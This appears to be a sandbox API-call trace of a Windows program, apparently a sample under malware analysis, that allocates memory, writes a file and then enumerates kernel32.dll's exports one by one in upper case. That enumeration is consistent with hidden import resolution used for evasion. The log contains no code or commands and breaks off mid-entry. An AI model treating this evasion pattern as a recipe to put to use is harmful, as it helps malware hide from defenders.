VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.048] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.049] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.049] CloseHandle (hObject=0x414) returned 1 [0087.049] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.049] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.050] CloseHandle (hObject=0x0) returned 0 [0087.050] CloseHandle (hObject=0x410) returned 1 [0087.050] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.050] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.051] GetTickCount () returned 0x114e35d [0087.051] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.051] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.051] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.051] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.051] lstrlenA (lpString="kernel32.dll") returned 12 [0087.052] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.052] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.052] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.052] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.052] lstrlenA (lpString="ADDATOMA") returned 8 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.052] lstrlenA (lpString="ADDATOMW") returned 8 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.052] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.052] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.052] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.052] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.052] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.052] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.052] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.052] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.052] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.052] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.052] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.052] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.053] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.053] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.053] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.053] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.053] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.053] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.053] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.053] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.053] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.053] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.053] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.053] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.053] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.053] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.053] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.053] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.053] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.053] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.054] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.054] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.054] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.054] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.054] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.054] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.054] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.054] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.054] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.054] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.054] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.054] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.054] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.054] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.054] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.054] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.054] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.054] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.055] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.055] lstrlenA (lpString="BEEP") returned 4 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.055] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.055] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.055] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.055] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.055] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.055] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.055] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.055] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.055] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.055] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.055] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.055] lstrlenA (lpString="CANCELIO") returned 8 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.055] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.055] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.055] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.055] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.055] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.056] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.056] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.056] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.056] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.056] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.056] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.056] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.056] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.056] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.056] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.056] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.056] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.056] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.056] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.056] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.056] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.056] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.056] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.057] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.057] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.057] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.057] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.057] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.057] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.057] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.057] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.057] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.057] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.057] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.057] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.057] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.057] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.057] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.057] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.057] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.057] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.058] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.058] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.058] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.058] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.058] lstrlenA (lpString="COPYFILEA") returned 9 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.058] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.058] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") 